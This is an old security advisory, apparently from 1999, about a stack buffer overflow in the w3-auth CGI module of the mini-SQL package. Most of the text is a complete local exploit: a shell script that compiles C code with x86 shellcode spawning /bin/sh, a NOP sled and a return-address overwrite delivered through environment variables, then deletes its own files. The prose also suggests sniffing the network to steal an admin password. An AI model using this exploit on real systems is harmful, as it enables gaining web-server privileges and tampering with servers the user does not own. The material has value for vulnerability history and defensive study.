Linux_mini-sql_bof.txt

`hi,  
  
i was looking for an exploitable buffer overflow in w3-msql   
(from Hughes Technology) since there was many security flaws   
inside.  
There is a static variable named PrivateScript in main()   
function with a 255 chars size length.  
No luck ! main() finish everywhere with an exit() call.  
The http internal server error produced with a big URI   
string (about 260 chars) is the fact of the modification of   
environments pointers in the stack just behind the return   
adress and argvs pointers.  
So the syscall getenv() produce a signal 11.  
  
No mind ! just take a look now in w3-auth.c :)  
and more specially in parseArgs().  
  
there is a static array of 30 chars named "var" and the   
function exit with a return.  
this is ok !  
It 's now possible to force remotly w3-auth cgi-bin to   
execute everything with httpd user priviledge (and may be,   
to modify everything in the web server)  
However to exploit this hole, attacker has to be   
authenticated by the cgi (the web server has to set   
HTTP_AUTHORIZATION environment var).  
So there are two ways to use this exploit:  
  
1- the hacker is an official msql database admin but without   
httpd priviledge (naturally !)  
2- the hacker starts by sniffing the network segment, steals   
an admin password and modify remotly the web server.  
  
  
  
now the script (local version only, just the necessary time  
for Hughes to patch the source)   
  
  
#!/bin/sh  
  
cat > ./w3-3gg.c << _EOEXPLOIT  
  
/*******************************  
*****************  
  
  
Local Linux exploit for   
w3-auth   
Authentication module from mini-sql package  
  
Gregory Duchemin Aka c3RbeR  
  
Neurocom -- Mai 1999  
E-mail: [email protected]  
  
  
******************  
********************************/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/param.h>  
#include <stdarg.h>  
  
  
#define GREEN "\033[1;32m"  
#define RED "\033[1;31m"  
#define NORM "\033[1;39m"  
#define NOP 0x90  
  
  
  
char *EGG;  
char *bob;  
long *ret;  
int size;  
  
  
long StackPointer();  
int usage(char *);  
void Thisistheend(long);  
  
  
/*  
Shellk0de from the great Phr4ck Ezine  
*/  
  
  
char shell[]=  
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x5  
6\x0f"  
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd  
1\xcd"  
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";  
  
  
  
int main (int argc, char *argv[]){  
int cnt;  
unsigned long sp;  
int dec;  
sp = cnt = 0;  
  
  
  
if (argc>=4) usage(argv[0]);  
  
  
size=250;  
if (argc>=2) size=atoi(argv[1]);  
  
  
dec=15;  
if (argc>=3) dec=atoi(argv[2]);  
sp=StackPointer();  
sp-=dec;  
  
  
printf("%s\n Using buffer size = %d, return adress = %02X   
with stack offset =   
%d\n\n", GREEN, size, sp, dec);  
Thisistheend(sp);  
}  
  
  
  
/* Wh3re is my Stack P0inter ? Ask the esp registry... */   
  
long StackPointer()  
{  
__asm__("movl %esp, %eax\n");   
}  
  
  
  
  
int usage (char *name)   
{  
printf("%s Usage:%s [size] [offset] \n",RED,name);  
printf("Default: %s 250 15 \n %s",name, NORM);  
exit(1);  
}  
  
  
  
  
void Thisistheend (long sp)   
{  
int cnt;  
  
  
if (!(EGG=(char *)malloc(size)))   
{  
perror("Malloc error\n\n");  
exit(1);  
}  
  
  
/* First Step....filling buffer with NoOperation */  
  
for(cnt=0;cnt<(size-1);cnt++)  
*(EGG+cnt)=NOP;  
  
  
/* Next, insert your own code */  
  
bob=EGG+80;  
for (cnt=0; cnt<strlen(shell); cnt++)  
*(bob++)=*(shell+cnt);  
  
  
/* Then, your return adress in the stack to point toward the   
shell code */   
  
  
ret = (unsigned long *) (EGG+36);  
*(ret)=sp;  
  
  
  
EGG[size-1]='\0';  
  
  
/*   
apache set this env variables  
Note: "Http authentication" means that script kiddy'll have   
to get a pass  
*/  
  
  
setenv("REQUEST_METHOD", "GET", 1);  
setenv("HTTP_USER_AGENT", EGG, 1);   
setenv("QUERY_STRING", EGG, 1);   
  
  
  
  
/* Simulate a good authentication localy */  
  
setenv("HTTP_AUTHORIZATION", "1", 1);  
  
  
system("/bin/sh -c \"echo -e \'\nReady to fight captain   
!\n\nLook at the env(s) and   
...\n\nJust launch w3-auth and see...\n\n\n\'\"");  
system("/bin/sh");  
}  
_EOEXPLOIT  
  
  
gcc ./w3-3gg.c -o ./w3-3gg  
echo -e "\n\n Script started \n\n"  
./w3-3gg  
rm ./w3-3gg ./w3-3gg.c  
  
  
  
-------------------------------  
  
Gregory Duchemin  
  
Security Engineer  
  
NEUROCOM  
179-181 Av Charles de Gaulle  
92200 Neuilly sur Seine  
Tel: 01 41 43 84 84  
Fax: 01 41 43 84 80  
  
E-mail: [email protected]  
`